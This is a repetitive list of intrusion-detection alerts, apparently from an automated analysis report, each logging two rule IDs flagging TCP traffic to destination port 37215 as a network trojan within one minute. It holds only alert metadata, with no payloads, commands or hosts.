          Timestamp:06/09/24-16:33:32.687592
          SID:2835222
          Source Port:54378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033525
          SID:2829579
          Source Port:55434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.690064
          SID:2835222
          Source Port:53028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294033
          SID:2829579
          Source Port:53572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158387
          SID:2835222
          Source Port:35044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081712
          SID:2835222
          Source Port:52860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130600
          SID:2835222
          Source Port:44100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947061
          SID:2829579
          Source Port:58094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298131
          SID:2829579
          Source Port:50414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606767
          SID:2835222
          Source Port:41950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571283
          SID:2835222
          Source Port:49038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538921
          SID:2829579
          Source Port:37256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948172
          SID:2835222
          Source Port:50224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599313
          SID:2829579
          Source Port:39716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222847
          SID:2829579
          Source Port:39454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950082
          SID:2829579
          Source Port:39118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230648
          SID:2835222
          Source Port:45330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718210
          SID:2829579
          Source Port:39690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944366
          SID:2829579
          Source Port:36188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632530
          SID:2829579
          Source Port:47006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162025
          SID:2835222
          Source Port:41492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225977
          SID:2835222
          Source Port:56578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120537
          SID:2829579
          Source Port:54970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398208
          SID:2829579
          Source Port:58240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034510
          SID:2829579
          Source Port:37682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944937
          SID:2829579
          Source Port:34722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166182
          SID:2835222
          Source Port:59228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004135
          SID:2835222
          Source Port:49144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102903
          SID:2835222
          Source Port:48008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164885
          SID:2829579
          Source Port:58218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947648
          SID:2835222
          Source Port:36232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571323
          SID:2829579
          Source Port:57980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226994
          SID:2829579
          Source Port:40580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103266
          SID:2835222
          Source Port:57680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719012
          SID:2829579
          Source Port:47004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291651
          SID:2829579
          Source Port:59474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272771
          SID:2835222
          Source Port:35214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226858
          SID:2835222
          Source Port:33768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472009
          SID:2835222
          Source Port:35184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103028
          SID:2829579
          Source Port:43478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.635023
          SID:2829579
          Source Port:36682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078107
          SID:2829579
          Source Port:41630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928712
          SID:2829579
          Source Port:44230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400433
          SID:2829579
          Source Port:54208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080825
          SID:2835222
          Source Port:58676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922929
          SID:2829579
          Source Port:39332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224450
          SID:2835222
          Source Port:35082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292812
          SID:2835222
          Source Port:60422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291303
          SID:2835222
          Source Port:60718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033206
          SID:2835222
          Source Port:43966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717904
          SID:2835222
          Source Port:36938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282193
          SID:2829579
          Source Port:35852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035456
          SID:2835222
          Source Port:46578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302107
          SID:2835222
          Source Port:38076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399093
          SID:2829579
          Source Port:48880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284881
          SID:2835222
          Source Port:46180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929646
          SID:2835222
          Source Port:59908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926764
          SID:2835222
          Source Port:57082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413491
          SID:2835222
          Source Port:50716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867299
          SID:2829579
          Source Port:46204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290520
          SID:2829579
          Source Port:39760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538482
          SID:2835222
          Source Port:60300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820508
          SID:2829579
          Source Port:36426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821389
          SID:2829579
          Source Port:48100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865967
          SID:2835222
          Source Port:34034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952184
          SID:2835222
          Source Port:56944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821200
          SID:2829579
          Source Port:40916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075463
          SID:2835222
          Source Port:46410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564954
          SID:2835222
          Source Port:50876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539950
          SID:2829579
          Source Port:49018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472453
          SID:2829579
          Source Port:47882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.295624
          SID:2835222
          Source Port:51466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163598
          SID:2829579
          Source Port:52084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.480770
          SID:2835222
          Source Port:43166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249449
          SID:2835222
          Source Port:39096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104807
          SID:2835222
          Source Port:52052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119759
          SID:2835222
          Source Port:56478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993340
          SID:2829579
          Source Port:49246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399190
          SID:2835222
          Source Port:52114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130551
          SID:2829579
          Source Port:57632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306402
          SID:2835222
          Source Port:58678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032855
          SID:2835222
          Source Port:50352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244766
          SID:2829579
          Source Port:34560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283712
          SID:2835222
          Source Port:47880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034608
          SID:2829579
          Source Port:60012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595959
          SID:2835222
          Source Port:48226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227263
          SID:2835222
          Source Port:36444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017264
          SID:2835222
          Source Port:42382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823405
          SID:2835222
          Source Port:49532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945024
          SID:2829579
          Source Port:53504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166845
          SID:2835222
          Source Port:59522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169380
          SID:2829579
          Source Port:50416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299431
          SID:2835222
          Source Port:56818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606904
          SID:2829579
          Source Port:37074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720120
          SID:2835222
          Source Port:38894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.933708
          SID:2829579
          Source Port:40364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287893
          SID:2829579
          Source Port:42082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412932
          SID:2835222
          Source Port:34808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396610
          SID:2829579
          Source Port:51694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418592
          SID:2835222
          Source Port:34802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168265
          SID:2829579
          Source Port:51102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288456
          SID:2835222
          Source Port:37590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719013
          SID:2835222
          Source Port:56358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923777
          SID:2829579
          Source Port:54536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288881
          SID:2835222
          Source Port:37576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302495
          SID:2835222
          Source Port:40716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226186
          SID:2835222
          Source Port:52384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931578
          SID:2835222
          Source Port:44428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284724
          SID:2829579
          Source Port:55644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417411
          SID:2835222
          Source Port:53076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396910
          SID:2835222
          Source Port:43006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540169
          SID:2829579
          Source Port:46946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165148
          SID:2835222
          Source Port:57070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469258
          SID:2835222
          Source Port:54166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302590
          SID:2835222
          Source Port:58992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038089
          SID:2829579
          Source Port:41052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400292
          SID:2829579
          Source Port:41948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395923
          SID:2829579
          Source Port:44482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224998
          SID:2829579
          Source Port:57812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397985
          SID:2829579
          Source Port:57896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292535
          SID:2829579
          Source Port:50672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247107
          SID:2829579
          Source Port:55968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227748
          SID:2835222
          Source Port:37144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080766
          SID:2829579
          Source Port:45026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253210
          SID:2829579
          Source Port:36180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160957
          SID:2835222
          Source Port:41768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397390
          SID:2835222
          Source Port:38574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077051
          SID:2829579
          Source Port:39376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291228
          SID:2829579
          Source Port:51662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286886
          SID:2835222
          Source Port:50336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468066
          SID:2829579
          Source Port:47300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159996
          SID:2835222
          Source Port:60984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074607
          SID:2829579
          Source Port:44874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104006
          SID:2835222
          Source Port:43048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076583
          SID:2835222
          Source Port:58272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603602
          SID:2835222
          Source Port:33386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945174
          SID:2829579
          Source Port:38776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164947
          SID:2829579
          Source Port:58118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278767
          SID:2835222
          Source Port:46272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983319
          SID:2829579
          Source Port:54832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823603
          SID:2835222
          Source Port:44956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.085292
          SID:2835222
          Source Port:33768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716223
          SID:2835222
          Source Port:36610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033527
          SID:2829579
          Source Port:49964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399525
          SID:2829579
          Source Port:47194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283674
          SID:2835222
          Source Port:33258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598257
          SID:2835222
          Source Port:42154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.039640
          SID:2835222
          Source Port:50486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537828
          SID:2829579
          Source Port:44072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159370
          SID:2835222
          Source Port:33110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080172
          SID:2829579
          Source Port:36542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165351
          SID:2829579
          Source Port:57230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823085
          SID:2835222
          Source Port:51718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718574
          SID:2829579
          Source Port:54028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944163
          SID:2829579
          Source Port:60206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644816
          SID:2829579
          Source Port:60918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947277
          SID:2829579
          Source Port:39824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928467
          SID:2829579
          Source Port:58314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131261
          SID:2829579
          Source Port:56852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074583
          SID:2829579
          Source Port:43938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539514
          SID:2829579
          Source Port:52538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569385
          SID:2835222
          Source Port:47274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230596
          SID:2835222
          Source Port:58830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082061
          SID:2829579
          Source Port:53456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206972
          SID:2835222
          Source Port:58498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169209
          SID:2829579
          Source Port:53756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302127
          SID:2829579
          Source Port:53576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078072
          SID:2829579
          Source Port:49446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104708
          SID:2835222
          Source Port:46752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944253
          SID:2829579
          Source Port:50086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821226
          SID:2835222
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400081
          SID:2829579
          Source Port:47208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468470
          SID:2829579
          Source Port:54084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645837
          SID:2835222
          Source Port:37806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035624
          SID:2835222
          Source Port:53158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987168
          SID:2829579
          Source Port:50222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719620
          SID:2829579
          Source Port:38474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253111
          SID:2829579
          Source Port:51678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929571
          SID:2835222
          Source Port:54528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398893
          SID:2835222
          Source Port:51060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162310
          SID:2829579
          Source Port:48318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102938
          SID:2835222
          Source Port:36690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945270
          SID:2829579
          Source Port:49574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562199
          SID:2835222
          Source Port:57472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248641
          SID:2835222
          Source Port:60188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413905
          SID:2829579
          Source Port:34054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077236
          SID:2835222
          Source Port:43142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027932
          SID:2829579
          Source Port:54966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226562
          SID:2829579
          Source Port:46994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418333
          SID:2829579
          Source Port:45300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468490
          SID:2829579
          Source Port:45670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289481
          SID:2835222
          Source Port:43118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.947424
          SID:2835222
          Source Port:42680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944955
          SID:2829579
          Source Port:46608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693978
          SID:2835222
          Source Port:34346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558066
          SID:2835222
          Source Port:58198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102603
          SID:2835222
          Source Port:45662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643836
